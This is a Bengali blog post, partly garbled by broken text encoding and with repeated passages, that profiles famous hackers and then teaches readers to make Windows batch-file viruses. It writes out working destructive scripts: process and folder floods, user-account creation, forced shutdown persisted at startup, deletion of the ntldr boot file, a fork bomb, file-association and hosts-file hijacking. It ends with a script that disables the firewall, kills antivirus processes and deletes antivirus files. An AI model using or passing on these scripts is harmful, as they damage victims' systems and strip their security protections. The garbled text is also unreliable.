⧍ā§Ļā§Ļā§Ļ āϏাāϞে āĻāϝ়াāĻšু, āĻāĻŽাāĻāύ,āĻĄেāϞ, āĻāĻŦে,āĻāĻŦং āϏিāĻāύāĻāύ āĻāϰ āύেāĻāĻāϝ়াāϰ্āĻে āĻāĻ্āϰāĻŽāύ āĻāϰে āĻāĻ āĻš্āϝাāĻাāϰ āĻāϞোāĻāύাāϰ āĻļীāϰ্āώে āĻāĻ ে āĻāϏেāύ। āϤā§āĻাāϞীāύ āϏāĻŽāϝ়ে āĻāϝ়াāĻšু āĻিāϞ āĻļীāϰ্āώ āϏাāϰ্āĻ āĻāĻ্āĻিāύ। āĻিāύ্āϤু āĻāϰ āĻāĻ্āϰāĻŽāύেāϰ āĻāĻŦāϞে āĻāϝ়াāĻšুāϰ āϏাāϰ্āĻাāϰ ā§§ āĻāύ্āĻাāϰ āĻāύ্āϝ āĻŦāύ্āϧ āĻšāϝ়ে āϝাāϝ়। āĻ āύ্āϝাāύ্āϝ āĻš্āϝাāĻাāϰ āĻāϰ āĻŽāϤো āϤিāύি āĻ āϤাāϰ āĻš্āϝাāĻাāϰ āĻ্āϰুāĻĒ āĻāϝ়াāĻšুāϰ āϏাāϰ্āĻাāϰ āĻĒুāϰোāĻĒুāϰি āύিāϝ়āύ্āϤ্āϰāύে āĻāύāϤে āϏāĻ্āώāĻŽ āĻšāύ। ⧍ā§Ļā§Ļā§§ āϏাāϞে Montreal Youth Court āĻāϰ āύিāϰ্āĻĻেāĻļে āϤাāϰ āĻāĻ āĻŽাāϏেāϰ āĻেāϞ āĻšāϝ়।
Michael Calce
08. Robert Tappan Morris:
ā§§ā§¯ā§Žā§Ž āϏাāϞে worm āϤৈāϰি āĻāϰে Robert Morris āĻāύ্āĻাāϰāύেāĻে āĻĨাāĻা āĻāĻ āĻĻāĻļāĻŽাংāĻļ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻ āĻāĻ্āϰāĻŽāύ āĻāϰেāύ āĻāĻŦং āĻĒ্āϰাāϝ় ā§Ŧā§Ļā§Ļā§Ļ āĻšাāĻাāϰ āĻāϰāĻ āĻ āϧিāĻ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻ āϤাāϰ āύিāϝ়āύ্āϤ্āϰāύ āĻĒ্āϰāϤিāώ্āĻ া āĻāϰেāύ।āĻŽাāϤ্āϰ ⧝⧝ āϞাāĻāύেāϰ āĻোāĻĄ āϞিāĻে āĻļāϤ āĻļāϤ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻāĻ্āϰāĻŽāĻŖ āĻāϰেāύ।āĻĒāϰāĻŦāϰ্āϤিāϤে āĻāĻ āĻোāĻĄ āĻŽāϰিāϏ āĻāϝ়াāϰ্āĻŽ āύাāĻŽে āĻĒāϰিāĻিāϤি āϞাāĻ āĻāϰে। āϧāϰা āĻĒāϰাāϰ āĻĒāϰ āĻŽāϰিāϏ āĻāϤ্āĻŽāĻĒāĻ্āώ āϏāĻŽāϰ্āĻĨāύ āĻāϰে āĻŦāϞে, āϏে āĻোāύ āĻাāϰাāĻĒ āĻাāĻ āĻāϰে āύি।āĻোāĻĄ āĻাāĻĄ়াāϰ āĻŽূāϞ āĻāĻĻ্āĻĻেāĻļ্āϝ āĻিāϞ āĻāύ্āĻাāϰāύেāĻেāϰ āϏাāĻĨে āĻāϤāĻুāϞো āĻāĻŽ্āĻĒিāĻāĻাāϰ āϏংāϝুāĻ্āϤ āĻāĻে āϤা āĻŦেāϰ āĻāϰা। āϤāĻŦে āϤাāĻে āϏāύাāĻ্āϤ āĻāϰāϤে āĻĒুāϞিāĻļেāϰ āĻŦেāĻļি āϏāĻŽāϏ্āϝা āĻšāϝ়āύি āĻাāϰāĻŖ āĻāĻ āĻাāĻāϰাāϏ āĻাāĻĄ়াāϰ āĻĒ্āϰাāϝ় āĻāĻāĻŽাāϏ āĻĒূāϰ্āĻŦে āϤিāύি āĻ্āϝাāĻিং āĻāϰ āϏāĻŽāϝ় āĻāĻ āĻাāĻāϰাāϏ āĻāϰ āĻŦ্āϝাāĻĒাāϰে āĻāĻাāϏ āĻĻিāϝ়েāĻিāϞেāύ āĻāĻāĻি āĻিāϞ āϤাāϰ āĻুāϞ। āϤাāϰ āĻাāώ্āϝāĻŽāϤে , āϤাāϰ āĻাāĻāϰাāϏ āĻāϤৃāĻ āĻāĻ্āϰাāύ্āϤ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻāϰ āĻোāύ āĻ্āώāϤি āĻšāĻŦে āύা। āĻŽāϰিāϏ āĻŦāϰ্āϤāĻŽাāύে āĻŦৈāĻĻ্āϝুāϤিāĻ āĻĒ্āϰāĻৌāĻļāϞ āĻ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻŦিāĻ্āĻাāύ āĻŽ্āϝাāϏাāĻুāϏেāĻāϏ āĻāύāϏ্āĻিāĻিāĻāĻ āĻ āĻŦ āĻেāĻāύোāϞāĻি (āĻāĻāĻি) āĻŦিāĻাāĻে āĻাāĻ āĻāϰāĻেāύ।

Robert Tappan Morris
09.Albert Gonzalez:
āĻĒ্āϰāĻĨāĻŽ āĻĒāϰিāĻিāϤি āϞাāĻ āĻāϰেāύ ATM āĻ āĻ্āϰেāĻĄিāĻ āĻাāϰ্āĻĄেāϰ āϤāĻĨ্āϝ āĻুāϰিāϰ āĻŽাāϧ্āϝāĻŽে। āϤিāύি āĻŦāϰ্āϤāĻŽাāύ āϏāĻŽāϝ় āĻĒāϰ্āϝāύ্āϤ āϏāĻŦāĻেāϝ়ে āĻŦেāĻļী āĻ্āϰেāĻĄিāĻ āĻাāϰ্āĻĄ āĻāϰ āϤāĻĨ্āϝ āĻুāϰি āĻāϰে āϰেāĻāϰ্āĻĄ āĻāϰেāύ।⧍ā§Ļā§Ļā§Ģ āĻĨেāĻে ⧍ā§Ļā§Ļā§ āϏাāϞ āĻĒāϰ্āϝāύ্āϤ āϏে āĻāĻŦং āϤাāϰ āϏāĻšāϝোāĻীāϰা āĻĒ্āϰাāϝ় ā§§ā§ā§Ļ āĻŽিāϞিāϝ়āύ āĻ্āϰেāĻĄিāĻ āĻাāϰ্āĻĄ āĻŦিāĻ্āϰি āĻāϰে। . Gonzalez SQL āĻĒāĻĻ্āϧāϤি āĻŦ্āϝāĻŦāĻšাāϰ āĻāϰে malware backdoors āϤৈāϰি āĻāϰে āĻŦিāĻিāύ্āύ āĻāϰ্āĻĒোāϰেāĻ āϏাāϰ্āĻিāϏ āĻ āĻĒ্āϰāĻŦেāĻļ āĻāϰāϤ āĻāĻŦং packet-sniffing (āĻŦিāĻļেāώāϤ ARP Spoofing) āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻāĻŽ্āĻĒিāĻāĻাāϰ āύেāĻāĻāϝ়াāϰ্āĻে āĻĒ্āϰāĻŦেāĻļ āĻāϰে āϤāĻĨ্āϝ āĻুāϰি āĻāϰāϤ। āĻ্āϰāĻĢāϤাāϰ āĻšāĻāϝ়াāϰ āϏāĻŽāϝ় āϤাāϰ āĻাāĻ āĻĨেāĻে $ā§§.ā§Ŧ āĻŽিāϞিāϝ়āύ āĻĄāϞাāϰ āĻŦাāĻেāϝ়াāĻĒ্āϤ āĻāϰা āĻšāϝ়।āϝাāϰ āĻŽāϧ্āϝে ā§§.ā§§ āĻŽিāϞিāϝ়āύ āĻāĻĻ্āϧাāϰ āĻāϰা āĻšāϝ় āϤাāϰ āĻŦাāĻĄ়িāϰ āĻāĻ াāύ āĻুāĻĄ়ে āĻĒāϞিāĻĨিāύেāϰ āĻŦ্āϝাāĻ āĻĨেāĻে।⧍ā§Ļā§§ā§Ļ āϏাāϞে āϤাāϰ ā§§ā§Ļ āĻŦāĻāϰেāϰ āĻেāϞ āĻšāϝ়।
Albert Gonzalez
10.Kevin Poulsen:
Dark Dante(Code Name) āύাāĻŽে āĻĒāϰিāĻিāϤ Kevin Poulsen āĻāĻŽেāϰিāĻাāύ āĻš্āϝাāĻাāϰ FBI āĻĄাāĻাāĻŦেāĻ āĻ āϏ্āĻেāĻļāύ āĻĢোāύ āϞাāĻāύ্āϏ āĻš্āϝাāĻ āĻāϰে āĻāϞোāĻāύাāϰ āĻāĻĄ় āϤুāϞেāĻিāϞেāύ। āĻāϝ়āĻ্āĻāϰ āĻāĻ āĻš্āϝাāĻাāϰ LA āϰেāĻĄিāĻ āϏ্āĻেāĻļāύ āĻš্āϝাāĻ āĻāϰে āĻĒāϰিāĻিāϤি āϞাāĻ āĻāϰে। āĻĒāϰে āϤাāϰ āĻŦিāϰুāĻĻ্āϧে āĻ āĻিāϝোāĻ āĻāĻ āύ āĻāϰা āĻšāϞে āϤিāύি āĻāϤ্āĻŽāĻোāĻĒāύ āĻāϰেāύ। āϤāĻŦে ⧧⧝⧝⧧ āϏাāϞেāϰ āĻĻিāĻে āϏে FBI āĻāϰ āĻšাāϤে āϧāϰা āĻĒāĻĄ়ে।āϤাāϰ āĻŦিāϰুāĻĻ্āϧে āĻāύিāϤ āĻ āĻিāϝোāĻেāϰ āĻŽāϧ্āϝে āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻেāϞেāĻ্āĻাāϰি, āĻ āϰ্āĻĨ āĻĒাāĻাāϰ, āϏāĻš āϤāĻĨ্āϝ āĻুāϰিāϰ āĻ āĻিāϝোāĻ āϏে āϏ্āĻŦীāĻাāϰ āĻāϰেāύ। āϝাāϰ āĻĢāϞে āϤাāϰ ā§Ģā§§ āĻŽাāϏেāϰ āĻেāϞ āĻšāϝ়। āĻāĻি āĻĒৃāĻĨিāĻŦীāϤে āϤā§āĻাāϞীāύ āϏāĻŽāϝ় āĻĒāϰ্āϝāύ্āϤ āĻš্āϝাāĻিং āĻāϰ āĻĻাāϝ়ে āϏāĻŦāĻেāϝ়ে āĻŦāĻĄ়(āĻĻীāϰ্āĻāϤāĻŽ) āĻļাāϏ্āϤি। āĻŦāϰ্āϤāĻŽাāύে āϤিāύি Wired News āĻāϰ āϏাংāĻŦাāĻĻিāĻ āĻ āϏিāύিāϝ়āϰ āĻāĻĄিāĻāϰ āĻšিāϏেāĻŦে āĻāϰ্āĻŽāϰāϤ āĻāĻেāύ।
Kevin Poulsen
HOW TO CREATED VIRUS........
āĻāĻাāύে āĻāĻŽি āĻোāύ āϏ্āĻ্āϰিāύāĻļāĻ āĻĻেāĻŦ āύা āĻাāϰāύ āĻāĻŽি āύিāĻেāĻ āĻ āύেāĻ āϏাāĻāĻ āĻĒā§ে āĻāĻŦং āĻ āĻিāĻ্āĻāϤা āĻĨেāĻে āĻāĻি āϞিāĻāĻি ...............
What are Batch Files ?
āĻāĻāĻা āĻāĻĻাāĻšāϰāĻŖ āĻĻিā§ে āĻļুāϰু āĻāϰা āϝাāĻ । star āĻĨেāĻে āϰাāύ āĻ āĻিā§ে cmd āĻāĻĒেāύ āĻāϰুāύ । āĻāĻāύ āĻāĻĒāύাāϰ āĻĄাāĻāϰেāĻ্āĻāϰি "Desktop" āĻĨেāĻে āϏāϰাāϤে "Cd Desktop" āĻাāĻāĻĒ āĻāϰুāύ āĻāĻĻ্āϧāϰāύ āĻিāĻš্āύ āĻাā§া । āĻāĻāύ āύিāĻেāϰ āϤিāύāĻি āĻāĻŽ্āϝাāύ্āĻĄ āĻāĻ āĻāĻ āĻāϰে āϞিāĻুāύ ।
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'āϞāĻ্āώ্āϝ āĻāϰুāύ āĻāĻŽāϰা āĻি āĻāϰāϞাāĻŽ । āĻĒ্āϰāĻĨāĻŽে x āĻĢোāϞ্āĻĄাāϰ āϤৈāϰি āĻāϰāϞাāĻŽ । āĻāϰāĻĒāϰ āĻāϰ āĻেāϤāϰে āĻিā§ে y āĻĢোāϞ্āĻĄাāϰ āϤৈāϰি āĻāϰāϞাāĻŽ। āĻāϰāĻĒāϰ x āĻĄিāϞিāĻ āĻāϰে āĻĻিāϞাāĻŽ ।
āĻāĻāύ āĻāĻ āĻাāĻ āĻাāĻ āĻāĻāĻু āĻ āύ্āϝ āĻাāĻŦে āĻāϰুāύ । āĻāĻুāϞāĻে āύিā§ে āύোāĻāĻĒ্āϝাāĻĄ āĻ āĻāĻĒি āĻāϰে āϏেāĻ āĻāϰুāύ । āύাāĻŽ āĻāϰ āĻļেāώ āĻ .bat āĻĨাāĻāϤে āĻšāĻŦে ।
āϤাāĻšāϞে āĻĻেāĻāĻŦেāύ āĻāĻĒāϰে āĻŦāϰ্āĻŖিāϤ āĻাāĻ āĻা āĻšāĻŦে ।
āϤাāĻšāϞে āĻŦোāĻা āĻেāϞ batch āĻšāĻ্āĻে āĻāĻŽāύ āϧāϰāύেāϰ āĻĢাāĻāϞ āĻাāĻāĻĒ āϝা āĻšāϞ āϤাāϰ āĻŽāϧ্āϝে āĻĻেā§া āĻāĻŽ্āϝাāύ্āĻĄ āĻুāϞāĻে āĻ āύুāϏāϰāύ āĻāϰে āĻাāĻ āĻāϰে । āĻāĻĒāύি āĻšā§āϤāĻŦা āĻŽāύে āĻāϰāĻŦেāύ Malware āĻŦা āĻোāĻ Trojan āĻŦাāύাāύ āĻুāĻŦ āĻāĻ িāύ । āϏেāϰāĻāĻŽ āύা । āĻিāύ্āϤু āϝে āĻŦাāύাāĻŦে āϤাāϰ āĻŽাāύāϏিāĻāϤাāĻ āĻāϏāϞ
What can batch viruses do ?
āĻĒ্āϰāĻļ্āύ āĻšāϞ āĻāĻĻেāϰ āĻĻিā§ে āĻি āĻি āĻাāĻ āĻāϰা āϝাā§ ??
āĻāĻĻেāϰ āĻĻিā§ে āĻ āύেāĻ āĻাāĻ āĻāϰা āϝাā§ āϝেāĻŽāύ āϧāϰুāύ āĻĄাāĻা āĻĄিāϞিāĻ āĻāϰা। āĻĄ্āϰাāĻāĻ āĻĢāϰāĻŽেāĻ , āϤāĻĨ্āϝ āĻুāϰি , āĻাāĻāϰাāϏ āĻāĻ্āĻেāĻ্āĻ, āĻĒাāϰāĻĢāϰ্āĻŽেāύ্āϏ āĻŦাāϧা āĻ্āϰāϏ্āĻĨ āĻāϰা । āĻাāĻŽাāĻা āĻŽাāύুāώ āĻে āĻŦিāĻĒāĻĻে āĻĢেāϞা āĻāϏāĻŦ............
āĻāĻāύ āĻিāĻু āĻāĻĻাāĻšāϰāĻŖ āĻĒ্āϰ্āϝাāĻāĻিāϏ āĻāϰা āϝাāĻ। āύিāĻেāϰ āĻোāĻĄ āĻুāϞো āĻĒিāϏিāϤে āϏেāĻ āĻāϰে āĻĻেāĻুāύ ।
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
āĻĒ্āϰāĻĨāĻŽে
āĻāĻĒāύাāĻে @echo off āĻĻিā§ে āĻĢাāĻāϞ āĻে āĻ
āύ্āϝ āĻĢাāĻāϞ āĻĨেāĻে āĻāϞাāĻĻা āĻāϰāϤে āĻšāĻŦে । āĻāϰāĻĒāϰ āĻāĻ
āϏāĻŦ āĻāĻāϏাāĻĨে āĻŦা āĻāϞাāĻĻা āĻāϞাāĻĻাāĻাāĻŦে āύোāĻāĻĒ্āϝাāĻĄ āĻ āϞিāĻে .bat āĻĻিā§ে āϝে āĻোāύ āύাāĻŽে āϏেāĻ
āĻāϰুāύ । āĻāĻুāϞো āĻ্āώāϤিāĻāϰ āύা । āĻāĻĒāύি āĻāĻĒেāύ āĻāϰāϤে āĻĒাāϰেāύ । āϤāĻŦে āĻāĻাāĻŦেāĻ āĻāĻŽাāύ্āĻĄ
āĻāĻŽ্āĻŦাāĻāύ্āĻĄ āĻāϰে victim āĻে āĻŦিāϰāĻ্āϤ āĻāϰা āĻšā§ ।
2. Folder flooder
@echo off
md %random% // makes directory/folder.
goto x%random% āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻŦāϞা āĻšā§েāĻে āϝে āĻোāύ āϧāύাāϤ্āĻŽāĻ āϏংāĻ্āϝা āĻĒ্āϰিāύ্āĻ āĻāϰāϤে । āϝাāϰ āĻĢāϞে āĻāĻি āĻāĻĒেāύ āĻāϰāϞে āϝে āĻোāύ āĻĄ্āϰাāĻāĻ āĻ āĻāĻি āĻĢোāϞ্āĻĄাāϰ āĻŦাāύাāϤেāĻ āĻĨাāĻāĻŦে । āĻāĻি āĻĒিāϏিāϤে āĻāĻĒেāύ āĻāϰāĻŦেāύ āύা ।
3.User account flooder
@echo off
net user %random% /add //create user account
goto x
āĻāĻি āϝেāĻোāύো āύাāĻŽ্āĻŦাāϰ āĻŦāϏিā§ে āĻāĻāύ্āĻĄোāĻ āĻ āĻāĻāϝাāϰ account āϤৈāϰি āĻāϰāϤে āĻĨাāĻāĻŦে
4.Shutdown Virus
shutdown -s -t 00 //
āĻāĻ āĻোāĻĄ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻĒিāϏি āϏাāĻĨে āϏাāĻĨে āĻŦāύ্āϧ āĻšā§ে āϝাāĻŦে । āĻŽāύে āĻšāĻŦে āĻšাāϰ্āĻĄāĻĄিāϏ্āĻ āĻĢেāĻāϞ āĻāϰেāĻে
āĻিāύ্āϤু
āĻāĻি āĻāĻāĻŦাāϰ āĻāĻ āĻšāĻŦে āĻāĻĒāύি āϝāĻĻি āĻāĻি āĻাāϞু āϰাāĻāϤে āĻাāύ āϤāĻŦে “C:\Documents and
Settings\Administrator\Start Menu\Programs\Startup” āĻāĻŦং “C:\Documents
and Settings\All Users\Start Menu\Programs\Startup”āϤে āĻĒেāϏ্āĻ āĻāϰāϤে āĻšāĻŦে ।
āϝাāϰ āĻĢāϞে āĻĒিāϏি āĻাā§া āĻšāϞে āĻŦাāϰāĻŦাāϰ āĻāĻি āĻšāϤে āĻĨাāĻāĻŦে । āĻāĻĒāύাāĻে āĻāĻ āĻĻুāĻ āĻĄিāϰেāĻ্āĻāϰি
āĻĨেāĻে āĻĢাāĻāϞ āĻĻিāϞিāĻ āĻāϰে āĻāĻি āĻŦāύ্āϧ āĻāϰāϤে āĻšāĻŦে ।āĻāĻ āĻোāĻĄ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻĒিāϏি āϏাāĻĨে āϏাāĻĨে āĻŦāύ্āϧ āĻšā§ে āϝাāĻŦে । āĻŽāύে āĻšāĻŦে āĻšাāϰ্āĻĄāĻĄিāϏ্āĻ āĻĢেāĻāϞ āĻāϰেāĻে
5. Deleting boot filesGoto C drive in Win XP , Tools->Folder Option->View
āĻāĻāύ 'Show hidden files and folders'. āĻ āĻেāĻ āĻĻিā§ে āĻŦেāϰ āĻšā§ে āĻāϏুāύ । āĻāĻāύ āĻāĻĒāύি āĻ āĻĒাāϰেāĻিং āϏিāϏ্āĻেāĻŽ āĻāϰ āĻĢাāĻāϞ āĻĻেāĻāϤেāĻ āĻĒাāĻŦেāύ । 'ntldr' āύাāĻŽে āĻāĻāĻি āĻĢাāĻāϞ āĻāĻে āϝা āĻāĻāύ্āĻĄোāĻ āĻāϰ āĻŦূāĻ āύিā§āύ্āϤ্āϰāύ āĻāϰে . āĻāĻāύ āĻāĻে āĻĄিāϞিāĻ āĻāϰāϤে āĻāĻāĻা āĻŦ্āϝাāĻ āĻĢাāĻāϞ āĻŦাāύাāĻŦ
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
āĻāĻি āϰাāύ āĻāϰাāϰ āϏাāĻĨে āϏাāĻĨে āĻĢাāĻāϞ āĻি āĻĄিāϞিāĻ āĻšā§ে āϝাāĻŦে । āĻāĻĒāύি āύিāĻেāϰ āĻĒিāϏি āϤে āĻāĻি āϰাāύ āĻāϰāĻŦেāύ āύা ।
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
āĻāĻ āĻোāĻĄ āĻĢাāĻāϞ āĻŽ্āϝাāύেāĻাāϰ āĻে āĻŦāϞāĻŦে āĻুāύ āĻšāϤে । āϝাāϰ āĻĢāϞে āĻāĻĒāύাāϰ āĻ
āĻাāύ্āϤে āĻĒিāϏিāϤে āĻ্āϝাāĻļ āĻŽেāĻŽāϰি āĻŦেā§ে āϝাāĻŦে āĻļেāώ āĻ āĻĒিāϏি āĻš্āϝাঁ ং āĻšāĻŦে
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
āĻĒ্āϰāϤāĻি
āĻĢাāĻāϞ āĻāϰ āĻāϞাāĻĻা āĻĢāϰāĻŽেāĻ āĻāĻে āϝেāĻŽāύ .exe, .jpeg, .mkv āĻāϤ্āϝাāĻĻি । āĻāĻ āĻোāĻĄ
āĻাāϞাāĻŦাāϰ āϏাāĻĨে āϏাāĻĨে āϏāĻŦ āĻĢāϰāĻŽেāĻ āĻ āϞāĻ āĻĒাāϞāĻ āĻšā§ে āϝাāĻŦে āĻāĻŦং । āĻĒ্āϰোāĻ্āϰাāĻŽ āϰি
āĻāύ্āϏāĻাāϞ āĻāϰāϤে āĻšāĻŦে । āϤাāĻ āĻ
āύ্āϤāϤ āĻĒিāϏি āϤে āĻāĻি āĻāϞাāĻŦেāύ āύা ।
7. DNS Poisoning
āĻāĻĒāύাāϰ
āĻāĻāύ্āĻĄোāĻ āĻ ‘hosts’ āύাāĻŽে āĻĢাāĻāϞ āĻāĻে āĻāĻাāύে
c:\windows\system32\drivers\etc. āĻāĻŽāϰা āĻāĻাāύে āĻāĻāĻি āĻāĻāĻĒি āĻāĻŦং āĻā§েāĻŦāϏাāĻāĻ āĻŦāϏিā§ে
āĻĻিāϤে āĻĒাāϰি . āϤাāĻšāϞে āĻāĻŽাāĻĻেāϰ āĻŦ্āϰাāĻāϝাāϰ āϏেāĻ āĻā§েāĻŦāϏাāĻāĻ āĻ āĻāĻŽাāĻĻেāϰ āύিā§ে āϝাāĻŦে .
@echo off
echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts //āĻāĻ āĻāĻŽ্āϝাāύ্āĻĄ āϤাāĻšāϞে āĻāĻāĻĒি āĻāĻŦং āĻā§েāĻŦāϏাāĻāĻ āĻে host āĻ āĻĒ্āϰিāύ্āĻ āĻāϰāĻŦে
xxx.xxx.xxx.xxx āĻāĻŦং http://www.anything.com āĻ āĻāĻĒāύাāϰ āĻাāĻ্āĻিāϤ āĻāĻāĻĒি āĻāĻŦং āĻā§েāĻŦāϏাāĻāĻ āĻŦāϏাāĻŦেāύ । āĻāϰāĻĢāϞে āϝে āĻāĻি āĻāĻĒেāύ āĻāϰāĻŦে āϏে āϏেāĻ āϏাāĻāĻ āĻাā§া āϤাāϰ āĻŦ্āϰাāĻāϝাāϰ āĻ
āύ্āϝ āϏাāĻāĻ āĻĻেāĻāϤে āĻĒাāĻŦেāύা ।
Limitations of Batch Viruses -:
āĻিāύ্āϤু āĻিāĻু āϏāĻŽāϏ্āϝা āĻāĻে ...............
āϝে āĻেāĻ āĻāĻি āĻāĻĒেāύ āύা āĻāϰে āύোāĻ āĻĒ্āϝাāĻĄ āĻĻিā§ে āĻিāĻ āĻāϰāϤে āĻĒাāϰে । āϝাāϰ āĻĢāϞে āϏে āϏāϤāϰāĻ āĻšā§ে āϝাāĻŦে ।
āĻāĻি āĻাāĻāϰাāϏ āĻšāϞে āĻāύ্āĻিāĻাāĻāϰাāϏ āĻ āĻāĻāύ্āĻĄোāĻ AlaRt āĻĻেāĻŦে । āĻāϰ āϏāĻŽাāϧাāύ āĻāĻে ।
āĻিāύ্āϤু āĻāĻŽি āĻŦāϞāĻি āύা । āĻাāϰাāĻĒ āĻĒাāϰāĻĒাāϏে āĻŦ্āϝাāĻŦāĻšাāϰ āĻšāϤে āĻĒাāϰে ।
āĻāĻāĻা āĻ āĻĢ āĻāĻĒিāĻ । āĻাāϞ āύা āϞাāĻāϞে āĻā§িā§ে āϝাāύ
āĻিāύ্āϤু āĻিāĻু āϏāĻŽāϏ্āϝা āĻāĻে ...............
āϝে āĻেāĻ āĻāĻি āĻāĻĒেāύ āύা āĻāϰে āύোāĻ āĻĒ্āϝাāĻĄ āĻĻিā§ে āĻিāĻ āĻāϰāϤে āĻĒাāϰে । āϝাāϰ āĻĢāϞে āϏে āϏāϤāϰāĻ āĻšā§ে āϝাāĻŦে ।
āĻāĻি āĻাāĻāϰাāϏ āĻšāϞে āĻāύ্āĻিāĻাāĻāϰাāϏ āĻ āĻāĻāύ্āĻĄোāĻ AlaRt āĻĻেāĻŦে । āĻāϰ āϏāĻŽাāϧাāύ āĻāĻে ।
āĻিāύ্āϤু āĻāĻŽি āĻŦāϞāĻি āύা । āĻাāϰাāĻĒ āĻĒাāϰāĻĒাāϏে āĻŦ্āϝাāĻŦāĻšাāϰ āĻšāϤে āĻĒাāϰে ।
āĻāĻāĻা āĻ āĻĢ āĻāĻĒিāĻ । āĻাāϞ āύা āϞাāĻāϞে āĻā§িā§ে āϝাāύ
āĻ āĻĒāϰ্āϝāύ্āϤ āϝাāϰা āĻāĻŽাāϰ āĻŦāĻāĻŦāĻ āĻļুāύেāĻেāύ āϤাāĻĻেāϰ āϧাāϰāύা āĻšā§েāĻে āĻāĻুāϞো āĻĻিā§ে āĻļুāϧু āĻāϝেāĻŦাāϝে āĻাāĻ āĻāϰা āϝাā§ । āϤা āύা ......
āĻāĻŽি āĻāĻāĻা āĻোāĻāĻাāĻো batch antivirus āĻāϰ āĻো āĻĄ āĻāϰেāĻি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______ BCA ___________
āĻāĻি āĻāĻĒāύাāϰ āĻĒিāϏি āϤে zekono kichu .bat āύাāĻŽে āϏেāĻ āĻāϰুāύ । āĻāĻিāϤে āĻāĻĒāύি āϝে āĻোāύ .bat āĻĢাāĻāϞ āĻāϰ āύাāĻŽ āϞিāĻে āϏ্āĻ্āϝাāύ āĻāϰāϤে āĻĒাāϰāĻŦেāύ ।
āĻāĻŽি āĻāĻāĻা āĻোāĻāĻাāĻো batch antivirus āĻāϰ āĻো āĻĄ āĻāϰেāĻি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______ BCA ___________
āĻāĻি āĻāĻĒāύাāϰ āĻĒিāϏি āϤে zekono kichu .bat āύাāĻŽে āϏেāĻ āĻāϰুāύ । āĻāĻিāϤে āĻāĻĒāύি āϝে āĻোāύ .bat āĻĢাāĻāϞ āĻāϰ āύাāĻŽ āϞিāĻে āϏ্āĻ্āϝাāύ āĻāϰāϤে āĻĒাāϰāĻŦেāύ ।
World Top virus code(any hard disk crash))
Just copy the code and paste the notepad than save as """pleasehack.bat"" mind it ".bat"
than save.carefully don"t open bat file.
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
